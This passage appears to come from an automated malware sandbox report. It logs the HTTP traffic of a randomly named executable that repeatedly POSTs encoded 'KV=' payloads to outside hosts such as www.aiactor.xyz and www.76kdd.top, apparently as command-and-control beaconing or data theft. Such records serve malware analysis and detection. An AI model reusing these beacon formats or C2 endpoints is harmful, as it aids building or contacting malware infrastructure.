                                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzUxZDc2ZGYtZDljOS00NDE3LWI4ZjEtOTMxMDU3ZjM5OTNlIiwicGFnZV90aW1lIjoxNzMyMTE4MT


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        32192.168.2.1150008199.59.243.227803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:56:22.529843092 CET504OUTGET /mxde/?KV=8xKxkpsUUE6O2YGNwLnJ/+WM1qqfoI8NOsOkZIrS/NSsfWu+QjWct9+gZKiyGOAYB5Pljgx8M21MT9QArezJJe5Vce6MQIBegnnKKN1EkLTSu1v+eqsUQ+w=&Wno=a0qDq HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Host: www.bcg.services
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Nov 20, 2024 16:56:23.664572954 CET1236INHTTP/1.1 200 OK
                                                                                                                        date: Wed, 20 Nov 2024 15:56:23 GMT
                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                        content-length: 1434
                                                                                                                        x-request-id: 9493e055-9419-4f4d-8c22-a03ab25c49d4
                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qMBghzBMFkm+XxvnnAVNvHoaLBGCz7IRfQQIrQzUnIxsahseTRShyOHtELI3ir93B/NWhF1yO05am1jvbpnsJQ==
                                                                                                                        set-cookie: parking_session=9493e055-9419-4f4d-8c22-a03ab25c49d4; expires=Wed, 20 Nov 2024 16:11:23 GMT; path=/
                                                                                                                        connection: close
                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 4d 42 67 68 7a 42 4d 46 6b 6d 2b 58 78 76 6e 6e 41 56 4e 76 48 6f 61 4c 42 47 43 7a 37 49 52 66 51 51 49 72 51 7a 55 6e 49 78 73 61 68 73 65 54 52 53 68 79 4f 48 74 45 4c 49 33 69 72 39 33 42 2f 4e 57 68 46 31 79 4f 30 35 61 6d 31 6a 76 62 70 6e 73 4a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qMBghzBMFkm+XxvnnAVNvHoaLBGCz7IRfQQIrQzUnIxsahseTRShyOHtELI3ir93B/NWhF1yO05am1jvbpnsJQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                        Nov 20, 2024 16:56:23.664628983 CET887INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTQ5M2UwNTUtOTQxOS00ZjRkLThjMjItYTAzYWIyNWM0OWQ0IiwicGFnZV90aW1lIjoxNzMyMTE4MT


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        33192.168.2.115000913.248.169.48803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:56:29.451134920 CET771OUTPOST /x4ne/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.aiactor.xyz
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 199
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.aiactor.xyz
                                                                                                                        Referer: http://www.aiactor.xyz/x4ne/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 46 68 38 50 66 49 6e 32 75 69 2b 70 55 66 72 59 44 53 47 42 38 44 76 4e 30 72 2f 37 6a 42 6f 46 42 41 50 30 32 2f 42 38 7a 74 68 38 66 45 37 77 4d 63 42 61 50 46 47 58 37 78 73 65 72 72 43 6f 6c 57 56 2f 68 2b 37 36 79 64 62 4a 62 45 68 32 72 37 59 43 39 62 35 6a 71 53 61 2f 42 64 2f 6d 34 2f 34 31 67 4d 4b 4b 58 5a 48 57 2b 39 4f 36 75 6f 79 38 67 73 2f 63 78 79 74 56 44 44 4e 43 6a 66 45 38 6e 47 33 79 30 43 2b 38 6a 46 6e 4c 76 43 4a 72 67 51 6b 65 52 72 68 39 4a 6d 45 55 79 4b 6f 69 66 57 44 6b 45 50 77 47 32 4a 42 47 59 38 64 59 43 6a 77 50 7a 49 6d 79 30 70 5a 45 32 77 3d 3d
                                                                                                                        Data Ascii: KV=Fh8PfIn2ui+pUfrYDSGB8DvN0r/7jBoFBAP02/B8zth8fE7wMcBaPFGX7xserrColWV/h+76ydbJbEh2r7YC9b5jqSa/Bd/m4/41gMKKXZHW+9O6uoy8gs/cxytVDDNCjfE8nG3y0C+8jFnLvCJrgQkeRrh9JmEUyKoifWDkEPwG2JBGY8dYCjwPzImy0pZE2w==


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        34192.168.2.115001013.248.169.48803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:56:32.117017031 CET791OUTPOST /x4ne/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.aiactor.xyz
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 219
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.aiactor.xyz
                                                                                                                        Referer: http://www.aiactor.xyz/x4ne/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 46 68 38 50 66 49 6e 32 75 69 2b 70 55 39 2f 59 51 6c 61 42 36 6a 76 53 74 4c 2f 37 70 68 6f 42 42 41 7a 30 32 36 67 78 7a 65 56 38 63 6b 4c 77 4e 64 42 61 4d 46 47 58 6a 68 74 57 68 4c 43 7a 6c 57 52 33 68 38 2f 36 79 64 66 4a 62 47 4a 32 71 4d 45 42 38 4c 35 68 6e 79 61 35 50 39 2f 6d 34 2f 34 31 67 49 62 6c 58 5a 2f 57 2b 4a 79 36 75 4a 79 37 75 4d 2f 62 32 79 74 56 55 54 4e 47 6a 66 45 6b 6e 43 32 70 30 41 32 38 6a 48 2f 4c 68 77 68 6f 35 67 6b 69 4d 37 67 30 48 56 67 5a 71 59 78 49 48 46 69 52 4b 76 67 4b 2b 76 4d 63 49 66 55 50 42 77 34 4e 6e 75 48 43 39 59 38 4e 74 2b 77 5a 71 4b 56 75 4e 4c 4e 38 56 70 68 63 43 5a 50 68 71 6f 30 3d
                                                                                                                        Data Ascii: KV=Fh8PfIn2ui+pU9/YQlaB6jvStL/7phoBBAz026gxzeV8ckLwNdBaMFGXjhtWhLCzlWR3h8/6ydfJbGJ2qMEB8L5hnya5P9/m4/41gIblXZ/W+Jy6uJy7uM/b2ytVUTNGjfEknC2p0A28jH/Lhwho5gkiM7g0HVgZqYxIHFiRKvgK+vMcIfUPBw4NnuHC9Y8Nt+wZqKVuNLN8VphcCZPhqo0=


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        35192.168.2.115001113.248.169.48803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:56:34.781539917 CET1804OUTPOST /x4ne/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.aiactor.xyz
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1231
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.aiactor.xyz
                                                                                                                        Referer: http://www.aiactor.xyz/x4ne/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 46 68 38 50 66 49 6e 32 75 69 2b 70 55 39 2f 59 51 6c 61 42 36 6a 76 53 74 4c 2f 37 70 68 6f 42 42 41 7a 30 32 36 67 78 7a 65 4e 38 63 57 44 77 50 2b 5a 61 4e 46 47 58 39 78 74 56 68 4c 44 68 6c 53 39 7a 68 38 7a 4d 79 66 58 4a 62 6c 78 32 37 4e 45 42 79 4c 35 68 37 43 61 38 42 64 2f 33 34 2f 49 78 67 4d 2f 6c 58 5a 2f 57 2b 49 69 36 2b 49 79 37 6a 73 2f 63 78 79 74 4a 44 44 4e 69 6a 63 30 65 6e 43 79 35 30 78 57 38 69 6e 76 4c 6a 46 39 6f 6d 51 6b 61 4e 37 67 73 48 56 64 5a 71 62 56 75 48 46 6e 30 4b 74 41 4b 38 37 5a 4c 4e 64 6f 7a 53 47 67 6c 34 2f 2f 68 35 34 46 4f 76 64 34 74 69 66 64 2b 5a 72 59 70 56 49 64 57 59 62 37 52 34 75 45 48 36 6f 6c 57 61 67 48 31 31 42 73 4f 6a 34 45 75 49 4e 6e 33 52 7a 45 76 2b 68 58 61 4e 41 4a 4c 78 59 58 2f 77 39 42 72 6b 70 76 33 67 73 74 61 49 61 4b 36 42 30 7a 65 49 61 78 78 33 4f 7a 56 36 48 55 4f 4d 41 69 6b 62 68 49 65 62 61 61 33 51 7a 64 4b 46 52 77 4a 31 4c 34 6f 4f 2b 63 47 36 2f 76 69 5a 4e 4c 4b 50 68 6f 4e 32 48 34 43 52 4c 31 47 4e 70 32 [TRUNCATED]
                                                                                                                        Data Ascii: KV=Fh8PfIn2ui+pU9/YQlaB6jvStL/7phoBBAz026gxzeN8cWDwP+ZaNFGX9xtVhLDhlS9zh8zMyfXJblx27NEByL5h7Ca8Bd/34/IxgM/lXZ/W+Ii6+Iy7js/cxytJDDNijc0enCy50xW8invLjF9omQkaN7gsHVdZqbVuHFn0KtAK87ZLNdozSGgl4//h54FOvd4tifd+ZrYpVIdWYb7R4uEH6olWagH11BsOj4EuINn3RzEv+hXaNAJLxYX/w9Brkpv3gstaIaK6B0zeIaxx3OzV6HUOMAikbhIebaa3QzdKFRwJ1L4oO+cG6/viZNLKPhoN2H4CRL1GNp28yfsQBYRrIaO29ETHRncEoKmGm5q+IZd/P6hQfQdLsBahv+NQbewwhHknYicniGHNJ5e5uH2HCziK+fa8tydQLCpDkOcC1MpJ2L2SLGo+EWP4FCiyrisGuP/SU8xLJ6n/wVzsk3NPdKSel7AzVuG4l+Ori4qD9ykzxYXm3EkOp/rhPY1Wz8IJ2fqCuz1RDgBojjNPyAF+WhW+3BEF0p+VVkM3HkCCn4C4UdN6V5m4NYzYuSXORNGajbqBHv1i0WXZPD9wuPWVOSSPBrcLEkYRvaCoj4XQw+TFelkVkm5FERmwzIqrXkD0Rsi8J2oUYF4qe83wa7y7qGLWp+evioWoGUD+aXZhMtsmQgg/E44JaHFLwwvj2e6zN8oKC0IiHMgIw9gaHUjUJI5sqlQ2j4IluS/pWdYT56JRPv4gUnC5t57DiKI3bmFOqrkBbpFWlYVdNKSrXW79DDI9xjSdBd/ezaqYVUCtQkJFo9yU6BzLfiatsdWWbqmdYkSy8Z6WCQMAAUcnrBuOw5Af5MwOmm4VUFgLCk5XQUJv+JDtWbBSozh32z5nxjCLUW+O/1co2bcRpAEXVjp64bt/rXUNiTmLr9AEWTd2eiR8mbBWXBdmj0PtUt4QwpKdvvdSoo8zkMK0PvDZdykkC5mXuXhaGtWA68OSX1QtH15nu [TRUNCATED]


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        36192.168.2.115001213.248.169.48803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:56:37.440304041 CET503OUTGET /x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Host: www.aiactor.xyz
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Nov 20, 2024 16:56:38.575033903 CET388INHTTP/1.1 200 OK
                                                                                                                        Server: openresty
                                                                                                                        Date: Wed, 20 Nov 2024 15:56:38 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 248
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4b 56 3d 49 6a 55 76 63 39 57 31 7a 44 69 4e 63 39 50 71 66 58 4b 78 31 54 53 30 72 36 4c 61 68 78 51 54 4d 78 44 2b 32 2f 39 74 78 76 4d 6b 4c 48 62 51 48 76 68 43 50 56 53 70 37 79 59 42 68 5a 71 56 73 41 4e 63 6a 75 4c 63 33 38 69 72 44 32 30 49 36 76 38 63 31 76 31 79 74 54 2b 44 45 65 69 2f 39 6f 64 61 6b 4d 44 46 59 75 44 57 7a 4b 47 6c 2f 70 2b 4c 6d 70 6f 3d 26 57 6e 6f 3d 61 30 71 44 71 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq"}</script></head></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        37192.168.2.115001338.47.232.194803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:56:44.386914968 CET765OUTPOST /idu4/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.76kdd.top
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 199
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.76kdd.top
                                                                                                                        Referer: http://www.76kdd.top/idu4/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 6e 42 55 38 44 58 50 49 59 32 78 7a 59 33 6f 4e 56 43 2b 66 4a 41 4e 78 32 75 73 45 78 68 62 77 6e 7a 71 57 47 62 52 33 4d 52 49 2f 37 49 45 4b 75 2f 70 43 32 56 56 44 63 49 53 2b 6e 75 54 6c 6d 6e 6d 62 4d 49 53 49 54 51 75 32 79 76 78 59 75 48 39 56 6c 62 37 46 30 70 69 58 6a 73 37 65 35 43 73 76 34 54 6e 69 2b 63 31 4a 68 61 7a 38 79 74 53 63 71 61 63 66 50 53 2b 73 6f 35 79 2b 2f 50 68 6d 6c 32 43 65 77 54 63 79 39 69 53 61 33 39 64 51 53 74 48 79 42 4d 70 68 6f 6a 36 74 41 75 52 33 78 4f 58 70 43 52 70 37 5a 55 57 62 66 78 57 78 77 76 4f 4d 74 32 4b 47 42 79 76 42 74 77 3d 3d
                                                                                                                        Data Ascii: KV=nBU8DXPIY2xzY3oNVC+fJANx2usExhbwnzqWGbR3MRI/7IEKu/pC2VVDcIS+nuTlmnmbMISITQu2yvxYuH9Vlb7F0piXjs7e5Csv4Tni+c1Jhaz8ytScqacfPS+so5y+/Phml2CewTcy9iSa39dQStHyBMphoj6tAuR3xOXpCRp7ZUWbfxWxwvOMt2KGByvBtw==
                                                                                                                        Nov 20, 2024 16:56:45.940375090 CET312INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Wed, 20 Nov 2024 15:56:45 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 148
                                                                                                                        Connection: close
                                                                                                                        ETag: "66e02f2c-94"
                                                                                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        38192.168.2.115001438.47.232.194803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:56:47.061878920 CET785OUTPOST /idu4/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.76kdd.top
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 219
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.76kdd.top
                                                                                                                        Referer: http://www.76kdd.top/idu4/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 6e 42 55 38 44 58 50 49 59 32 78 7a 5a 57 59 4e 59 42 57 66 50 67 4e 79 35 4f 73 45 34 42 62 73 6e 7a 32 57 47 65 77 73 50 6a 73 2f 36 74 6f 4b 76 36 56 43 31 56 56 44 58 6f 53 2f 36 65 54 2b 6d 6e 71 35 4d 4d 53 49 54 57 43 32 79 71 56 59 75 32 39 53 2f 72 36 6a 38 4a 69 5a 73 4d 37 65 35 43 73 76 34 54 7a 4d 2b 59 5a 4a 6d 71 44 38 79 4d 53 54 6e 36 63 63 5a 69 2b 73 6a 5a 79 79 2f 50 68 45 6c 33 75 30 77 52 30 79 39 6d 43 61 77 76 6c 58 4c 39 48 30 5a 73 6f 2b 6e 43 6e 59 5a 4d 41 63 31 2f 48 48 56 56 73 5a 52 79 62 42 50 53 66 6d 7a 38 47 4f 35 51 72 32 49 44 4b 49 32 35 66 45 4b 57 39 4b 45 72 6d 6b 45 5a 2f 52 69 6e 74 44 66 4d 4d 3d
                                                                                                                        Data Ascii: KV=nBU8DXPIY2xzZWYNYBWfPgNy5OsE4Bbsnz2WGewsPjs/6toKv6VC1VVDXoS/6eT+mnq5MMSITWC2yqVYu29S/r6j8JiZsM7e5Csv4TzM+YZJmqD8yMSTn6ccZi+sjZyy/PhEl3u0wR0y9mCawvlXL9H0Zso+nCnYZMAc1/HHVVsZRybBPSfmz8GO5Qr2IDKI25fEKW9KErmkEZ/RintDfMM=
                                                                                                                        Nov 20, 2024 16:56:48.616821051 CET312INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Wed, 20 Nov 2024 15:56:48 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 148
                                                                                                                        Connection: close
                                                                                                                        ETag: "66e02f2c-94"
                                                                                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        39192.168.2.115001538.47.232.194803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:56:49.860483885 CET1798OUTPOST /idu4/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.76kdd.top
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1231
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.76kdd.top
                                                                                                                        Referer: http://www.76kdd.top/idu4/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 6e 42 55 38 44 58 50 49 59 32 78 7a 5a 57 59 4e 59 42 57 66 50 67 4e 79 35 4f 73 45 34 42 62 73 6e 7a 32 57 47 65 77 73 50 6a 6b 2f 36 66 67 4b 76 5a 39 43 30 56 56 44 4c 59 53 69 36 65 53 75 6d 6e 69 39 4d 4d 58 39 54 56 32 32 67 63 4a 59 6d 69 52 53 78 62 36 6a 2b 4a 69 59 6a 73 37 75 35 43 38 72 34 54 6a 4d 2b 59 5a 4a 6d 73 6e 38 6d 4e 53 54 6c 36 63 66 50 53 2b 4a 6f 35 7a 62 2f 4f 4a 2b 6c 33 71 4f 77 68 55 79 39 48 75 61 78 63 64 58 44 39 48 32 4d 73 6f 32 6e 43 72 78 5a 4d 63 36 31 2f 7a 70 56 53 59 5a 56 58 4b 65 49 78 6e 76 6b 4b 61 59 36 77 58 55 49 7a 57 54 34 4c 79 36 62 6d 5a 76 66 73 79 6c 44 49 32 70 79 6e 5a 2f 4f 4d 76 45 56 64 42 36 6a 54 48 55 49 4e 45 42 39 59 67 31 34 62 63 66 5a 6c 52 4a 72 2b 58 68 74 4b 6d 6f 71 42 45 68 4f 6b 66 4f 6d 6d 46 45 77 64 2b 5a 4f 6f 6e 4d 39 70 6f 6a 48 62 57 41 4a 45 78 70 56 78 65 71 51 62 51 4f 5a 4b 50 67 36 58 4f 61 70 4f 6f 78 75 67 30 73 6c 50 7a 74 68 72 53 33 59 4e 77 4c 43 71 6c 73 6f 67 37 6c 55 37 49 70 43 62 56 77 53 76 30 [TRUNCATED]
